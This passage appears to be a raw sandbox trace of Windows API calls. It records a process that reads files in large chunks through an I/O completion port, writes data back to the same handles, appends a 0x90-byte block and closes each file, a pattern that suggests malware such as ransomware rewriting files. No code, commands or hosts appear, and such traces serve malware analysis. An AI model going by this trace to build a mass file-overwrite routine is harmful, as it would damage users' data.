CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0160.745] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0160.745] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0160.745] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0160.745] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.745] WriteFile (in: hFile=0x1dc, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0160.745] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.745] WriteFile (in: hFile=0x1ec, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3510020) returned 1 [0160.747] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.747] WriteFile (in: hFile=0x1a0, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3630020) returned 1 [0160.747] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.748] CloseHandle (hObject=0x1dc) returned 1 [0160.748] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0160.751] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.751] CloseHandle (hObject=0x1ec) returned 1 [0160.752] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0160.755] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0160.755] CloseHandle (hObject=0x1a0) returned 1 [0160.758] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0160.761] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.140] ReadFile (in: hFile=0x1ec, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 1 [0167.141] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.141] WriteFile (in: hFile=0x1ec, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0xf6a1, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0167.141] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.141] ReadFile (in: hFile=0x1ec, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 0x0 [0167.141] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0167.141] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.141] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.141] WriteFile (in: hFile=0x1ec, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0167.141] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.142] CloseHandle (hObject=0x1ec) returned 1 [0167.143] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0167.145] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.167] ReadFile (in: hFile=0x1ec, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0167.167] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.167] WriteFile (in: hFile=0x1ec, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x10fe9, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0167.168] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.168] ReadFile (in: hFile=0x1ec, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0167.168] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0167.168] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.168] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.168] WriteFile (in: hFile=0x1ec, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0167.171] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.171] CloseHandle (hObject=0x1ec) returned 1 [0167.174] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0167.174] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.243] ReadFile (in: hFile=0x1ec, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 1 [0167.243] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.244] WriteFile (in: hFile=0x1ec, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x12ef4, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0167.244] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.244] ReadFile (in: hFile=0x1ec, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 0x0 [0167.244] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0167.244] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.244] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.244] WriteFile (in: hFile=0x1ec, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0167.244] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.244] CloseHandle (hObject=0x1ec) returned 1 [0167.251] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0167.253] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.356] ReadFile (in: hFile=0x1e4, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 1 [0167.356] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.356] ReadFile (in: hFile=0x1dc, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3480020) returned 1 [0167.357] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.357] WriteFile (in: hFile=0x1e4, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x3d4f, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0167.357] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.357] WriteFile (in: hFile=0x1dc, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x15b96, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020) returned 1 [0167.358] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.358] ReadFile (in: hFile=0x1e4, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 0x0 [0167.358] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.358] ReadFile (in: hFile=0x1dc, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3480020) returned 0x0 [0167.358] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0167.358] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.358] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0167.358] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0167.358] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.359] WriteFile (in: hFile=0x1e4, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0167.359] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.359] WriteFile (in: hFile=0x1dc, lpBuffer=0x3480094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020 | out: lpBuffer=0x3480094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3480020) returned 1 [0167.359] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.359] CloseHandle (hObject=0x1e4) returned 1 [0167.360] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0167.363] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.363] CloseHandle (hObject=0x1dc) returned 1 [0167.364] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480020) returned 1 [0167.367] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.522] ReadFile (in: hFile=0x1e4, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0167.522] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.522] ReadFile (in: hFile=0x1dc, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0167.523] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.523] WriteFile (in: hFile=0x1e4, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x1476a, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0167.524] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.524] WriteFile (in: hFile=0x1dc, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x9600, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0167.524] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.525] ReadFile (in: hFile=0x1e4, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0167.525] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.525] ReadFile (in: hFile=0x1dc, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0167.525] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0167.525] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.525] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0167.525] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0167.525] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.525] WriteFile (in: hFile=0x1e4, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0167.525] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.525] WriteFile (in: hFile=0x1dc, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0167.525] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.526] CloseHandle (hObject=0x1e4) returned 1 [0167.533] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0167.534] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.534] CloseHandle (hObject=0x1dc) returned 1 [0167.539] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0167.542] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0167.933] ReadFile (in: hFile=0x1d0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 1 [0167.974] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.628] ReadFile (in: hFile=0x1ec, lpBuffer=0x3830124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3830020 | out: lpBuffer=0x3830124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3830020) returned 1 [0168.629] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.655] ReadFile (in: hFile=0x1c8, lpBuffer=0x3b90124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3b90020 | out: lpBuffer=0x3b90124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3b90020) returned 1 [0168.655] 